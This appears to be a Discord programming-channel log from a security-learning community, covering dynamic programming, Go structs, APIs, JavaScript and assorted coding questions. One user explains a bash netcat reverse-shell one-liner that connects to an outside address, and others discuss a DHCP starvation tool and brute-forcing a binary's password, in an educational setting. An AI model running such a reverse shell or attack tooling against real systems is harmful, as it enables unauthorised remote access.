as j.green says, it should be re.match("regex", variable)

A while ago I was looking for a THM API to get some basic user stats. I managed to write something which works, feel free to use it:

https://gist.github.com/ssnkhan/e7b3a7127c1b9a352ac7cd99b3621f20

@hexed raft Very cool repo. Did you see the repo szy made? It’s an entire wrapper for the API so it makes all of that very easy https://github.com/thm-community/thm-api-py

I hadn’t, thanks for this!

not all of the API

source: shodan

disclaimer: the api wrapper is currently not fully functioning because CF and broken login cuz recaptcha

I believe the cloudflare bit is fixed now

Bee got Skidy to remove it because it was tanking the SEO

I think the login might still be broken

the login:pass login method is definitely broken

cookie somehow broke and i wasn't able to fix it

gg

it is removeddd

In bottom-up dynamic programming we often initialise our DP array's first element [0] = 0, why?

I understand that X amount of 0 results to 0, but why do we even need that line? Why not ignore that?

Example coin change using DP:

class Solution:
    def coinChange(self, coins: List[int], amount: int) -> int: 
        
        dp = [float("inf")] * (amount + 1)
        
        dp[0] = 0
        
        for y in range(1, amount + 1):
            for coin in coins:
                
                if y - coin < 0:
                    continue
                
                dp[y] = min(dp[y], dp[y - coin] + 1)
                
        if dp[-1] == float("inf"):
            return -1
        
        return dp[-1]

Is it because in top-down that'd be the basecase, and we've just defined that in bottom-up this way?

So many letters

@magic falcon I think you'd know? 🥺

so i don't think there are like any rule on the first element. It's just the base case. Like most DP problems build up to something right? So the first case is considered with either the full amount or the 0 amount or the 1 amount of something.

even in this problem solutions can be built of from base case of 0 as well as from 1(let me find that for u). For some problems it can be arr[0]. you can see maximum subarray multiplications or those kind of solutions start with 1 just because 0xanything is zero.

maybe this answer is not entirely correct, only my interpretation. I never hardcode myself that dp[0]=0. for me depends on the problem and convenience honestly.

https://www.geeksforgeeks.org/coin-change-dp-7/
go to the 2nd dp solution.

# Base case (If given value is 0) 
table[0] = 1

I thought it'd be the base case! Thanks 😄

This was never explicitly mentioned that basecases were in bottom-up in my uni classes, I'm sure it was in CLRS somewhere but I couldn't find it 😆

yeah again, I am not a competitive programmer. I just know ds/aglo for the sake of interviews.

so ppl here would be much better explaining these things 🤣

I'm not hiring you then

okay.
resume rejected Bot not happy

bottom up style dynamic programming is, in some sense, counting. So to reach the right value at the end the 'sum'-ish result is intialized to zero. IIRC the knapsack problem is a better demonstration of the algorithm

coin changing also reduces to knapsack, so similar solution should apply

@stone kayak give me a few hours to get back home and review, if you still have questions we can go over it then

I think I'm okay, I just didn't intuitively get the idea that dp[0] = 0 in knapsack is the base case in top-down, it makes sense

I guess, whereas the base case is what we reach in top-down, the base case is what we start from in bottom-up

Which makes sense, and shows why we need it -- we're traversing up the tree so we start with the basecase 😄

It's been a few years since I had to explain DP, sorry I didn't remember everything off the top of the head

u will forget the intuition behind the actions after some time. you just remember the actions. Like "We need to do it" but why u need to do it you will forget pretty quickly 🤣 atleast for me.

Ordering of fields in golang struct has an impact on the overall struct size. Cause golang blocks 4 bytes if the next field can be fitted inside the remaining 4bytes otherwise it blocks 8bytes.( that's how i explained it to myself, not 100%sure)

like if a struct is

type myStruct struct {
    myBool bool // 1 byte
    myFloat float64 // 8 bytes
    myInt int32 // 4 bytes
}

this will actually block
8bytes for 1byte bool
8bytes for 8byte float64
8bytes for 4byte int32
so total is 24bytes

type myStructOptimized struct {
    myFloat float64 // 8 bytes
    myInt int32 // 4 bytes  
    myBool bool // 1 byte
}

But this will block
8bytes for 8byte float64
4bytes for 4byte int32
4bytes for 1byte bool
so total is 16bytes

u can exchange the int32 and bool and it will be same 16bytes.

@cold cloak ^

Huh, that's definitely something to keep a thought on

wonder if theres a Goland plugin that'll optimize automatically

there will be probably. But it's weird how sometimes it blocks 8byte and sometimes it blocks 4.

That’s wack

Thinking in terms of WORD alignment will help you

yeah that's what. But if you think about that words generally depend on ur processor. Like generally now it's 32 or 64 though. but maybe like windows where word is == 16bytes and dword 32 qword 64, for golang it may be word is 32bit.

It's architecture dependent not OS dependent. Not super familiar with go compiler optimizations, but gcc and clang have flags to determine how much optimization the compiler should attempt, and how densely to pack structs

is there a difference between a hashmap and a strict?

struct

u mean in golang? like map vs struct?

structs are equivalent to classes. Heck in C++ structs ARE classes(with some additional mofiers). And maps are just that key-value pair data structure. same as all the other langs that has struct.

For example, for a mvc application Structs are hugely used for creating models. Just like Java beans.

ohhhh

that makes a lot of sense

Just wanted to share how we use the New-pattern with interfaces in golang so that you can simulate the encapsulations. Also it doesn't have concept of private fields.

you can use the structs as well, with getter and setter that would work too. But interfaces are easier in the sense that we can put a the config interface in any function that excepts an interface. But we cannot pass a struct.

// config.go
/////////
package x
type Mdm struct {
    BaseUrl string `json:"base_url"`
}

//mdm_config.go
///////
package x
type MdmConfig interface {
    GetAccountRelationshipUrl() string
}

type mdmConfig struct {
    mdm Mdm
}

func NewMdmConfig(mdm Mdm) MdmConfig {
    return mdmConfig{mdm: mdm}
}

func (mdmConfig mdmConfig) GetAccountRelationshipUrl() string {
    return mdmConfig.mdm.BaseUrl + "/rel"
}

Usage:

package x
mdmConfig := NewMdmConfig(Mdm{
  BaseUrl: "http://mdm-base-url.com",
})
mdmConfig.GetAccountRelationshipUrl()

Big difference - hashmaps generally insert keys into a tree structure, with order being performed on the key instead of value. A struct is a lower level memory abstraction, usually aligned to architecture word size

structs in C++ don't map 1:1 with classes - the lack of private and protected variables and functions isn't explicitly supported in a struct, but can be faked with .h and .c file inclusions

Heyy! Opinion about this? .D
https://media.discordapp.net/attachments/792106636058689566/794734907158298634/unknown.png?width=1182&height=665

About what specifically?

About bot. What can i do for make it better? What features should i include?

If you can send the whole code (remove the token) as a paste bin I can review it for you, I'm pretty experienced in discordpy

@carmine locust

Or GitHub it

.

also pins

I’m not familiar with discordpy, but would there be any reason to actually have the token in code, not env or something?

wut

You can, but I can't presume he doesn't

Why would one hard code a token?

Easier

Other than it being the easy way.

I hope discord docs don’t suggest doing that 🙂

It doesn't suggest anything I think

if its a personal bot and you're the only one going to use it, and it can't cause substantial harm to your life then why not 😛

^

To not build a habit of doing thing insecurely 🙂

One of my bots has my weather API key hardcoded in it like whats the worst that someone could do? Get the weather using my key? 🤣

Sure, you can think of the risk involved. I think it’s a bad habit anyway.

Depends on the functionality of the API 🙂

"OH NO THEY'RE GOING TO GET THE WEATHER"

weather-api/get_account_details would be the worst probably if they had that functionality, but probably dont

Why would a weather api require any of that

Totally depends on the developers of the API, if many users want such functionality its usually added

But we're talking about bee's api

aha, he made his own? well then he's fully aware of any information that could be leaked with the key 🙂

Oh no arrow down

hii

everyone

guys i have a question

go on

ask it

what is an api

what does it do

That sounds like something to type into google

i did

but need an intuitive explanation

Do you know what a function is in programming?

yeah

Awesome

piece of code

so a function is a large program that contains a block of code that can be called upon at any point during the program

lol jabba starting from the building blocks

yeeah

and these are repeatable

yeah

Think of an API as a large function

hmm

it's just a lot of code

that you call

ok

and it performs an operation

hmm

operation on what

used to get information from internet

or somethign

Whatever you want it to

For example

A weather API gets the weather

ooo

it is programmed to work on application layer

but i still feel something off about it

API is just an interface between front end (whatever it may be from an desktop app to webapp to cli) and backend.

atleast from microarch perspective. But when a library exports some functions we also call it that library's api.

And also HTTP APIs

but the concept is same. It's an interface to talk to your bussiness logic

Huh @true pumice?...

What

That's, uh, not how I'd describe an API 😆

It's the easiest way I can explain it

jabba did good, cause they didn't know programming that much. I would have surely lost my patience.

An API is a program in its own right -- it provides an interface between which two separate applications can interact. For a Web API that would be your browser and the server, for example, but you also get things like the Windows API which allow programs to interface with the operating system

Hi guys. I been looking into DHCP exploitations on ARP level networks and trying to write my own starvation attack tool. I know there are many on github but I figured I'd learn more by doing. I'm currently using python3 and scapy to craft discovery packets.
I managed to make a couple of scripts that work. At least I think they do because my Wireshark registers the requests. However, my DHCP server doesn't seem to be wanting to play ball and it's just not setting up correctly. I'll try and fix that today, must be a configuration file issue.
Anyways, what I'm asking is...is there anyone on here who could help me out with the finishing touches on the script who has some more experience than me with python and scapy? I'm trying to clean it up so the command prompt interface is nicer with a banner, some threading on the results, better options available. Maybe even add a scanner feature and a clean up the ip tables after exploit is done. Just some features like that. I will post it on github once complete for everyone to mess around with.
I'm one of those guys who when I get stuck it can take me days to find the issue so a second pair of eyes and advice would be nice. The tool is to be used in an academic demonstration eventually. Nothing malicious! It's just to learn and have fun with in a virtual environment. If I wanted to cause mischief I would of just downloaded a working one from github.
Hope someone can help. I don't know anyone personally in Cyber Security or progammers to ask so thought you guys would be my best bet and up for the challenge.
Thanks!

A function is a small, repeatable section of code that's part of a larger program

An API is one (or potentially many) entire programs

I remember I was asked about REST verbs in 2-3 interviews that was hilarious

they expected get/post i also added put,patch,delete,head,options and they got confused themselves

(folks, that's how i got my job )

that's funny @tepid cargo

is that the same job that wanted you to add two numbers but didn't want bitshifting LMAO

YESH! I can't believe u remember

They asked me to swap two numbers, i used xor. They coudn't understand the logic. and asked me to do the same with "temp" variable.

lol dw Amazon will ask u to use xor

I would help if I had some time available I would look at some libraries to help you out creating nice CLI tools is really easy now I would look at adding Rich and Click to help with your command line output and args

https://github.com/xizhengszhang/Leetcode_company_frequency i am actually trying to solve company wise questions

@clear needle I will look into it. Doesn't have to be anything fancy. Just a very simple interface and clean outputs that don't constantly fill up your terminal. Was just thinking of adding some colour to the results to make it easier to read and some threading on the results. Thank you for the advice I will read up about it. The tool itself seems to work so the hard part is done I hope.

you should check out https://binarysearch.com , it's my favourite rn. 100% free (they're in beta) and they let you see company specific questions too 😄

reminds me a lot of THM in its younger days

oh.. what do u mean though? isn't it just a platform like codechef or leetcodes?

is anyone here

I have another

question

just put ur questions here, but you can also google them. Cause if would've searched "what is an api" that would've yielded more results

🙂

haha

@tepid cargo but i like asking people

Are you applying for positions in the big tech companies?

what is name dunder method in python

and why is it necessary

is it just used for knowing is file imported or run directly

yeah.. i have switched enough end decided to give the big ones a go to check what it's like

At least the process in getting in can be interesting.

Swe or security or what kind of a role are you looking for?

i am a like full fledged dev 🤣 i don't have security experience so I will go to a company as probably a dev then change the role. (which I am also doing in my current company)

I see. My problem would be that i’m partially in sec and part in swe, and that isn’t a good match to most roles 🙂

But i guess changing the role is easier in a huge corp than in small ones.

exactly ^ that is my only way as of now. I have a cousin in datadog doing pen testing for like 5+ years now. According to him, as I dev I have two good options if I don't want to lose my Dev experience.

1. going to a product based security firm. like for example rapid7
2. going to any company as the current profile and gradually change the role.

i am in progress with the 2nd one. and for the first one I didn't start

datadog????

thats elite

yeah i know. I didn't even know until few months ago. 🤣 even though we talk frequently

yeah he is lead pentester there

Kind of in the same seat @tepid cargo 🙂 but im switching to more sec focused within a smaller organization, im fortunate enough to have that opportunity

hes probably making bank $$$$$$$$$ dataddog is an elite company 😆

There a bunch of security companies that also hire people to make their private tools it incorporates both dev knowledge and deep knowledge of systems

Elite yes, the first hit on google for me gives their pricing page 🙂

Datadog is pretty leet, yes

Their product is pretty good too I hear

that's how you know their rich, when their pricing page comes up before their "what do we do" page 😂

🤣

They don't hire much as well, their pentesting team is like 5-6ppl

Oof, I am afraid how much you will flex then

lol i dont do things just to flex 😂😂

(yeah i do)

~~ok mr OSCP ~~

@tepid cargo I'll remove that OSCP then shall I?

nooo i put efforts in my flex

Do it Muir

mod abooose

You brought it upon yourself.

no go away. shoo shoo. make me mod for the programming channel. so that i can mute u from here @solar bay

https://tenor.com/JDMW.gif

.

const getData = async username => {
    const response = await fetch(`https://jsonplaceholder.typicode.com/todos/1`);
    const json = await response.json();

    setData(json);
}

okay i pressed enter too early

not good enough

const getData = async username => {
    const response = await fetch(`some-api/${username}`);
    const json = await response.json();

    setData(json);
}

let's say i have this function

and username is some state

is it best to pass the username as a parameter to the function or just whip it into the fetch call

the like PROPER PROPER way is to have a function that contains the base path.

and u use that function to get another path. Which also helps u isolate the security or validation aspect.

but this is frontend right?

yeah, the api is our backend

i'm not sure what you mean bu that first bit

so one thing is actually wrong is the adding the setData useState into the response.
cause setData's lifecycle is not synced with the actual promise.

Leggy is js pro 🥸

Leggy go to sleep

like creating a config like module that has the getUsernameRoute(username) or something. But if u are not doing enterprise application then the current one works.

it's only 10pm wut the 😐

Figured I’d start early 🤷‍♂️

but this one is more severe which would mess up certain part of the code after some time.
create a getData func whose responsibility is only to fetching the data, think like an HTTP wrapper.
and the other function whose responsiblity is to Update the frontend should call setData. Functions should always adhere to single responsibility rule.

ahh okay yeah i get you

for ur current answer an enterprise application would have a wrapper for that micro architecture api.
let's say ur backend is user-api
then there will be a module that will have the base url, the path configurations of that api. Let's say we call it UserWrapper.

then, we will call UserWrapper.getUserData(username)

just leaving it here.

blob shoo shoo

@tepid cargo

@stone kayak I'm looking at the Config-File documentation for RustScan, I have many questions.

Uh oh

That's not used super much tbh

the documentation may be lacking

Your HashMap in the config file

1. is that REALLY a tree?

2. are you expecting users to copy paste that entire map of all ports?

3. Why not just use an array with port number as index?

I have no idea, I haven't read that documentation in like 3 months 😅

Fair

I mainly work on Ciphey now, I do plan to go back to Rust at some point 😄

Next question is less critical: what made you pick TOML over YAML? And, are you planning on adding support for YAML and INI style configs?

I've been meaning to learn Rust, maybe I'll submit a few PRs

Rust uses TOML for its own config files, we chose it purely because Rust did. We didn't spend much time in studying the differences, for our purposes it was just pick one and we figured Rust programmers would know TOML more 😄

fair enough

TOML is nice

how can i please mesure my memory usage of my cpp program

use a profiler

yeah just search for "cpp profiler" or something

is it still valgrind these days?

yeah it is

looks like google made one too

but valgrind is also quite updated now a days. I think last version was released on 2020

yeah june 2020

I remember using it like 15 years ago...

oh dang.. i used it like 4-5years ago. but they liked bumped the version from 2 to 3.6 🤣

also i think intellij has a plugin for profiling.

it does

dunno if clion has one

wouldn't surprise me

intelliJ's is for the JDK though

not really. i use intelliJ idea profiler for android apps as well. But also there is i guess go profiler and react profiler that i used.

android is also basically JDK

i am talking about the idea pro verison

^ true 🤣

yeah I use Ultimate at work

but not really for web stuff

@brazen eagle Valgrind is still a thing. IIRC clang and gcc are moving towards having a compiler option to include profiling sanitizers, but I do not know state of those

I am trying to solve AoC1, Day 9. I think I have the python logic correct in my code, but am getting a TypeError: string indices must be integers error when executing the following code:

import requests
import json

host = "http://10.10.169.100:3000/"
pointer = {"value":"s","next":"f"}
flag = ""

while pointer["next"] != 'end':
    newURL = host + pointer["next"]
    response = requests.get(newURL)
    pointer = json.loads(response.text)
    
    flag += pointer["value"] 
    pointer = pointer["next"]

print (flag)

I have tried wrapping str() and a few other things, but not sure how to fix this. I am keen to understand how to fix this, rather than copying other solutions 🙂

did u check the pointer before the flag += line? like what it is printing and such?

Yes, the value is f

the value of whole pointer variable is f?

Sorry, I can only check the value of the pointer before the while loop

Python stops at line 10 (the while condition)

Solved it

cool

This was messing me up pointer = pointer["next"]

anyone has a good grasp on helm charts i am trying to make a stolon cluster but it's driving me nuts

Do you mean a windows styled dialogue box?

kinda

not exactly the same

for ur website? looks like u want to make some phishing sites hmmm? 🤣

but yeah it's just css

just tinker with css until u get the one u want

or maybe just take pic of this box and put buttons on the image. like a background image or something

https://github.com/AlexBSoft/win95.css try looking at this CSS github

win95 but still super cool

lol win95

Someone created their writeups using this css style

Looked awesome

lol yeah the screenshot looks identical to the win95 theme

i want to know which language is better for creating this?
you don't prefer php or JS for this?

styling is entire css.

u can go for sass or scss but those gets compiled to css.

so. for any type of UI component to style them u have to use CSS

tnx a lot guys

Does someone here use StudIo Code App for programming on IPad?

never had an ipad

@thin lynx check pins for code formatting

For ur question, Whenever you are doing anything in JS always checkout MDN. That's is the best resource by far.
https://developer.mozilla.org/en-US/docs/Web/API/Window/confirm

Return value

A boolean indicating whether OK (true) or Cancel (false) was selected. If a browser is ignoring in-page dialogs, then the returned value is always false.

if (window.confirm("Do you really want to leave?")) {
  window.open("exit.html", "Thanks for Visiting!");
}

i just took the example from the page.

I wanna learn JS

It looks so nice

no one uses vanilla JS anymore

Just large JS scripts

haha. 🤣 it is nice. If u know what u are doing it's straight up beautiful

They look 🤤

use React like everyone else

iit's super easy to learn

lol wut.

only 600 hours

JS has nothing to do with react

to learn

Bee

I want to learn JS

its a joke on how no one uses vanilla JS and everyoone just obsesses over React

react is just a library, u need to know js. libraries will come and go.

which bloats down everything

I don't want to go into some crappy framework without understanding the true beauty of a language

oh i would say learn typescript tho that actually looks very nice

also accessibility.

https://www.typescriptlang.org/

ts actually is good. and it is stricter that's why it's less easy to mess everything up.

tho u can be that dev and just put x:any to everything

yeah its harder to get bugs in a typed language

tnx a lot

oh no

when i prototype in TS, i am THAT DEV

made a program which takes 2 Bytes as an input and then exchange the Bytes in it

#include<stdio.h>

int main(void)
{
    short unsigned int num;
    printf("Enter the number: ");
    fscanf(stdin,"%hu",&num);
    
    printf("\nNumber with no swap between bytes---> %hu\n",num);
    
    unsigned char swapa,swapb;
    swapa=~num;
    num>>=8;
    swapb=~num;
    
    num=~swapa;
    num<<=8;
    num=~swapb;    //this line is not working why
    
    printf("Swaped bytes value----> %hu\n",num);
}```
however on the 2nd last line on which i commented everytime puts the 9th to 16th bit all on
tried input 4 expected 1024 but shows 65280
and 65280 as input gives the max value of 2 byte int

i liked it

just serve a file with application/x-octet-stream it will get automatically be downloaded by the browser.

i dont know what u are doing krax, seems kinda fishy to me. But u are using like the most outdated things ppl can do with html/js

can you tell me what are you doing?

yes, u r correct
but it's all in my own lab
i want to use it in my own company to show my colleagues how simple is that

It still seems kinda unethical

it's not simple tbh. what you are doing is fishy as helll

and 99.9999% would figure it out or browser will block it

i have no other options James
they are not serious about security

Ok, but are you familiar with rule 9?

Please don't bring unethical activities into this discord

yeah man
u r right

my bad

Does anyone know a good writeup explaining the code used for reverse shells? I'm in second year doing CS so I have the basics but looking at payload-all-the-things I'm not sure I get what is going on with them. The bash stuff in particular has my quite confused...

I wrote up a thing about it the other day

mkfifo /tmp/f; # Make a buffer. It's a First In First Out linux file thing. Think of it like a file.
cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f # Read in the contents of the buffer, pipe them into the shell (those are your commands etc, what you send to the remote system)
2>&1 # Combine the error output with the regular output (Otherwise, you wouldn't see errors as the <>| operators will only do regular output by default
| nc 10.0.0.1 # Send the output of the shell commands to your remote system (attacking machine)
>/tmp/f # this is where your shell inputs get send into the buffer, starting the process again```

this is a good explanation

ok yes that helps. I probably need to sit down with a pen and paper and draw it out. Or just play around with pipes and nc a bit more. But yes I'll definitely be yoinking that into my notepad 😄 Thanks

i used to explain it with drawing and boxes and cylinders 🤣

everyone liked my elite drawing skillzz

Q: "Sort an array"

Followup: "Can u do it in linear time"

From what ive seen till now, "Bucket sort seems to be a good way, [but it hugely depends on the input arr (weather they are uniformly distributed or not)], with O(n) time. (it was new to me)
Ive also known of counting and radix but they really dont work well against big int range.

If anyone know some good approach to it or a pre-existing algorithmn.. lmk

{p.s. its neither a homework or a quiz question or an interview question as of now.. so feel free}

Is that all the info you have on the array?

But yeah, counting, radix, and bucket sort are probably your only options unless you know a significant amount about the original array http://staff.ustc.edu.cn/~csli/graduate/algorithms/book6/chap09.htm

also "linear time", is that worst case?

You cannot make a comparison based sort faster than O(n log n)

yes

There's also https://en.wikipedia.org/wiki/Pigeonhole_sort

Actually Counting and Radix would work perfectly if ** i have information on the array ** but in this case i dont

i found this: http://personal.kent.edu/~rmuhamma/Algorithms/MyAlgorithms/Sorting/linearTimeIntro.htm

it doesnt really solve the problem but tells that radix and count wont work

yup thats why I asked if you know anything else on the array 😄

i will read Pigeonhole_sort

from interview perspective linear sort == always radix. and a explanation how comparison sort cannot be implemented less than nlogn

i have faced this question countless times. they don't want to know fancy algos. they want to know that you know that that's a very corner case.

for ppl using postgres in production environment do checkout stolon.
https://github.com/sorintlab/stolon
the performance is pretty epic

@stone kayak hello cutie

hey baby

i have a question that requires problem solving and my pee brain can't come up with an adequate solution 🥺

try meeee :))

the api we are using returns all of a user's games in an array, with the most recent game first
our website is going to return the first 10 results, and when you click the next button, get the next 10 etc

however, when someone loads the page, they get the first 10 results
if they then play a game (while staying on the website), and then click next, the next 10 will have a value that they already seen in the first 10, because everything got pushed down one

if that makes sense?

and we don't want them to see that duplicated value

- User requests first 10
> 1, 2, 3, 4, 5, 6, 7, 8, 9, 10
- User plays a game (this will push a new game to the start of the array)
> new-game, 1, 2, 3, 4, 5, 6, 7, 8, 9
- User clicks next
> 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20

notice how game "10" would be seen in both the first batch, and when the user clicks Next

my solution is to just cache each page and check if a game has been served before, and if so to skip it

i would say thats expected behaviour, no? if you write a blog post with pagination you expect it to get sent to the next page? Same with THM, if a room is released it goes to the next page 😛

hmmm

i mean kindaaaaaaaa

it's not a huge issue but we'd ideally not like it like that 🥺

I'm trying to brute force a C binary that asks for a password, the problem is that it uses stdio function to accept the input. How can I supply an input from a bash script?

Nobody asked me but I agree with bee that seems like it should be expected behavior

@night canopy just pipe it in with echo echo "$inp" | program

Ah. that would do it? Thanks i'll try it.

noooooo looksie here

https://stackoverflow.com/questions/13872273/api-pagination-best-practices

didn't find this until after i asked

This works when the program asks for the input only once, any ideas how would i be able to do it for the 2nd or 3rd... etc times?

This is the opposite of what you asked tho?

This is if something gets deleted it’ll show 99 instead of 100 things

But you said you wanna hide something they’ve already seen which is a different case

it's the same kinda thing blobbyy

Forgive my blob bren but isn’t that the opposite?

blobobobobboboboboboboboob

Luv luv

Me: Copying Helm charts from github repostories.

DEVOPS MAN!

hmm so for specific problems we can say that window sliding is "convolution" more or less

@night canopy at that point just make a python script with pwntools

Hey guys, trying to get ahead of devsecops and specifically automating response and event triage, the apps are written in .net and the infra is either using azure resourse manager or terraform, what would be the best scripting language to pick up for automating security tools for reaponse, SOAR is currently off the table for a couple years

Is python the most commonly adopted language out there, i come from a windows sys admin background so powershell is all i really know

u can try python/rust,both are really cool

Thank you I'll put those on my to do list 🙂

PowerShell can do interesting things as well